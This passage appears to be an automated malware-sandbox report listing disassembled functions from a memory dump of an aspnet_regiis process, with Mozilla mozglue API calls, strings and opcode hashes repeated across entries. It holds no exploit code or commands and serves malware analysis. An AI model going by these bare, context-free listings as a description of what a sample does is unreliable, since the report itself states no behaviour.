                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                                    • API String ID: 487479824-2878602165
                                                                                                                                                                    • Opcode ID: 34a257032b37067b6627320b4952f84a59518a73319645b7ed4abc1a91f47ad6
                                                                                                                                                                    • Instruction ID: 686a76d48d1fb8fdecc8a3eb0d30734db46752a5d0a94818312033e6b2a4e7a3
                                                                                                                                                                    • Opcode Fuzzy Hash: 34a257032b37067b6627320b4952f84a59518a73319645b7ed4abc1a91f47ad6
                                                                                                                                                                    • Instruction Fuzzy Hash: BDF1F770A052199FDB20CFA8CE48B9AB7B5AF45318F1442B9D819E3B41D731AF85CF91
                                                                                                                                                                    Function 6C7D7E10 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 403COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpystrlen
                                                                                                                                                                    • String ID: (pre-xul)$data$name$schema
                                                                                                                                                                    • API String ID: 3412268980-999448898
                                                                                                                                                                    • Opcode ID: 0747a7f3b093614838bf42490fd879c3eb74d348fba1f5d39952e15bdc4e359d
                                                                                                                                                                    • Instruction ID: c00d9701951fb063feba53aa5df8d404655582ba410cf7cfd076f182c4bdd35e
                                                                                                                                                                    • Opcode Fuzzy Hash: 0747a7f3b093614838bf42490fd879c3eb74d348fba1f5d39952e15bdc4e359d
                                                                                                                                                                    • Instruction Fuzzy Hash: 07E18FB1B043418BC710CF68C94565BFBEABB85318F558E2DE899D7780DB70ED098B91
                                                                                                                                                                    Function 6C7BD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C7CD1C5), ref: 6C7BD4F2
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C7CD1C5), ref: 6C7BD50B
                                                                                                                                                                      • Part of subcall function 6C79CFE0: EnterCriticalSection.KERNEL32(6C81E784), ref: 6C79CFF6
                                                                                                                                                                      • Part of subcall function 6C79CFE0: LeaveCriticalSection.KERNEL32(6C81E784), ref: 6C79D026
                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C7CD1C5), ref: 6C7BD52E
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E7DC), ref: 6C7BD690
                                                                                                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C7BD6A6
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E7DC), ref: 6C7BD712
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C7CD1C5), ref: 6C7BD751
                                                                                                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C7BD7EA
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                    • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                                    • API String ID: 2690322072-3894294050
                                                                                                                                                                    • Opcode ID: c32f9dd7e2e07834a4d7f21a298a3b1b0034ddb1c55ecc86f6b0c70b0db5659b
                                                                                                                                                                    • Instruction ID: 2aeecfb424257bb08660e4ca2b2ce215d5cc039eb86e7f439ad1b521c33ee9fb
                                                                                                                                                                    • Opcode Fuzzy Hash: c32f9dd7e2e07834a4d7f21a298a3b1b0034ddb1c55ecc86f6b0c70b0db5659b
                                                                                                                                                                    • Instruction Fuzzy Hash: 6591C371A047028FD724CF38C29466AB7E1EBA9318F14893EE55AD7F85D730E844CB86
                                                                                                                                                                    Function 6C7F4EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 6C7F4EFF
                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7F4F2E
                                                                                                                                                                    • moz_xmalloc.MOZGLUE ref: 6C7F4F52
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000), ref: 6C7F4F62
                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7F52B2
                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7F52E6
                                                                                                                                                                    • Sleep.KERNEL32(00000010), ref: 6C7F5481
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7F5498
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                                                                                                    • String ID: (
                                                                                                                                                                    • API String ID: 4104871533-3887548279
                                                                                                                                                                    • Opcode ID: e2c63972ec8334da7cb222abf955668e240531d1aa27fe956c795990594ad458
                                                                                                                                                                    • Instruction ID: 04e5ec7831d920bb8ce2a26b863bce51f670b87a702449886eb26d0cb9049f20
                                                                                                                                                                    • Opcode Fuzzy Hash: e2c63972ec8334da7cb222abf955668e240531d1aa27fe956c795990594ad458
                                                                                                                                                                    • Instruction Fuzzy Hash: 46F1B171A18B018FC726CF39C85162BB7F9AFD6388F05872EF856A7651DB319442CB81
                                                                                                                                                                    Function 6C7A7810 Relevance: 15.4, APIs: 12, Instructions: 372COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E744), ref: 6C7A7885
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E744), ref: 6C7A78A5
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E784), ref: 6C7A78AD
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E784), ref: 6C7A78CD
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E7DC), ref: 6C7A78D4
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C7A78E9
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000), ref: 6C7A795D
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000160), ref: 6C7A79BB
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C7A7BBC
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C7A7C82
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E7DC), ref: 6C7A7CD2
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C7A7DAF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeavememset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 759993129-0
                                                                                                                                                                    • Opcode ID: 0d45476715fdaa5c473f2a42b9e7c1f3767cecc4b925761506db9373d474e4d3
                                                                                                                                                                    • Instruction ID: 654dd4ccd7b0a551c1427887483e10b17e056184dd07f572c5020e20184694c0
                                                                                                                                                                    • Opcode Fuzzy Hash: 0d45476715fdaa5c473f2a42b9e7c1f3767cecc4b925761506db9373d474e4d3
                                                                                                                                                                    • Instruction Fuzzy Hash: 9D027271A0121ACFDB54CF59CA84799B7B5FF88318F2582AAD809A7715D730BE91CF80
                                                                                                                                                                    Function 6C7F7030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6C7F7046
                                                                                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C7F7060
                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7F707E
                                                                                                                                                                      • Part of subcall function 6C7A81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C7A81DE
                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7F7096
                                                                                                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7F709C
                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 6C7F70AA
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                                                                                                                    • String ID: ### ERROR: %s: %s$(null)
                                                                                                                                                                    • API String ID: 2989430195-1695379354
                                                                                                                                                                    • Opcode ID: ae0d42dbe7ec857c8ad52c6c9ffcd08d1ce24f19baa84c545743b1a864b65400
                                                                                                                                                                    • Instruction ID: 8d8858cbff70002cde4e999b4d56fe1a29e68f509fc33d0968099b88bb1fa886
                                                                                                                                                                    • Opcode Fuzzy Hash: ae0d42dbe7ec857c8ad52c6c9ffcd08d1ce24f19baa84c545743b1a864b65400
                                                                                                                                                                    • Instruction Fuzzy Hash: 8C0184B2A00109AFDB145BA5DC4EDAB7BFCEF49258B010439FA05A2B41D6716918CBE1
                                                                                                                                                                    Function 6C7E2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C7E2C31
                                                                                                                                                                    • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C7E2C61
                                                                                                                                                                      • Part of subcall function 6C794DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C794E5A
                                                                                                                                                                      • Part of subcall function 6C794DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C794E97
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C7E2C82
                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7E2E2D
                                                                                                                                                                      • Part of subcall function 6C7A81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C7A81DE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                                                                    • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                                    • API String ID: 801438305-4149320968
                                                                                                                                                                    • Opcode ID: 5681da29a4f2b62af4b7326fd123bdc2cebeeb97b9b07b9c9f8fd3c90446043e
                                                                                                                                                                    • Instruction ID: 398c7679de5f033cad3f97ed83f189114eb597e6ae60c464d6e15f15b64c5734
                                                                                                                                                                    • Opcode Fuzzy Hash: 5681da29a4f2b62af4b7326fd123bdc2cebeeb97b9b07b9c9f8fd3c90446043e
                                                                                                                                                                    • Instruction Fuzzy Hash: 1C91D2726087428FC724CF28C58969FB7E0AFC9358F104D2DE59A8BB60DB30D949CB52
                                                                                                                                                                    Function 6C7F9E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __aulldiv__aullrem
                                                                                                                                                                    • String ID: -Infinity$NaN
                                                                                                                                                                    • API String ID: 3839614884-2141177498
                                                                                                                                                                    • Opcode ID: 53b17d96b48c00e36ef2b9d0ef523a43733321107cbed980537a53c2fc9c7761
                                                                                                                                                                    • Instruction ID: a0d240c80e9119c69dcdb5f9cf086b71a68328f308a8261739ba931d7fd03116
                                                                                                                                                                    • Opcode Fuzzy Hash: 53b17d96b48c00e36ef2b9d0ef523a43733321107cbed980537a53c2fc9c7761
                                                                                                                                                                    • Instruction Fuzzy Hash: 21C1DE31F043198FDB14CFA8CA8479EB7B6FB84324F15452DD425ABB80DB71A94ACB91
                                                                                                                                                                    Function 6C80545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6C808A4B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memset
                                                                                                                                                                    • String ID: ~qyl
                                                                                                                                                                    • API String ID: 2221118986-1164895512
                                                                                                                                                                    • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                    • Instruction ID: b67ec6e34cba9fa6512ae4c01e99be038dc335e368658739ab64a4667c984d3b
                                                                                                                                                                    • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                    • Instruction Fuzzy Hash: 37B1D472B0021ACFDB24CF68CD917A9B7B2EF85314F1906A9C549EB781D730A985CB91
                                                                                                                                                                    Function 6C80542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6C8088F0
                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C80925C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memset
                                                                                                                                                                    • String ID: ~qyl
                                                                                                                                                                    • API String ID: 2221118986-1164895512
                                                                                                                                                                    • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                    • Instruction ID: 16308fe08f6f88023c83867b9bbf13cb2b449226b1f8d7bd0400b4671a9cc12f
                                                                                                                                                                    • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                    • Instruction Fuzzy Hash: B3B1C572F0160ACFDB24CE68CD816E9B7B2EF85314F150679C949EB785D730A989CB90
                                                                                                                                                                    Function 6C8050C7 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 280COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C808E18
                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C80925C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memset
                                                                                                                                                                    • String ID: ~qyl
                                                                                                                                                                    • API String ID: 2221118986-1164895512
                                                                                                                                                                    • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                                                                                                    • Instruction ID: 8ecc29be80798f407ddf7d8e52e29f51b68715e55e6ae3668bfe8b424f9ecc09
                                                                                                                                                                    • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                                                                                                    • Instruction Fuzzy Hash: ACA1D772F0021ACFCB24CE68CD90799B7B2AF85314F1546B9C949EB785D730A999CB90
                                                                                                                                                                    Function 6C7E77A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7E7A81
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7E7A93
                                                                                                                                                                      • Part of subcall function 6C7B5C50: GetTickCount64.KERNEL32 ref: 6C7B5D40
                                                                                                                                                                      • Part of subcall function 6C7B5C50: EnterCriticalSection.KERNEL32(6C81F688), ref: 6C7B5D67
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C7E7AA1
                                                                                                                                                                      • Part of subcall function 6C7B5C50: __aulldiv.LIBCMT ref: 6C7B5DB4
                                                                                                                                                                      • Part of subcall function 6C7B5C50: LeaveCriticalSection.KERNEL32(6C81F688), ref: 6C7B5DED
                                                                                                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C7E7B31
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4054851604-0
                                                                                                                                                                    • Opcode ID: 3bdde8b19eeaf440b82ae62774cb6e0448b80dccb53184ed882b137c61afbdb3
                                                                                                                                                                    • Instruction ID: 61773013f18072be56cfd2971def42b0180517a054ad639f5c71c368ee0198f0
                                                                                                                                                                    • Opcode Fuzzy Hash: 3bdde8b19eeaf440b82ae62774cb6e0448b80dccb53184ed882b137c61afbdb3
                                                                                                                                                                    • Instruction Fuzzy Hash: 42B1B1367083818BCB14CF25C65465FB7E2BFC9318F154A2CE99567791DB70E90ACB82
                                                                                                                                                                    Function 6C7F55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(user32,?,6C7CE1A5), ref: 6C7F5606
                                                                                                                                                                    • LoadLibraryW.KERNEL32(gdi32,?,6C7CE1A5), ref: 6C7F560F
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C7F5633
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C7F563D
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C7F566C
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C7F567D
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C7F5696
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C7F56B2
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C7F56CB
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C7F56E4
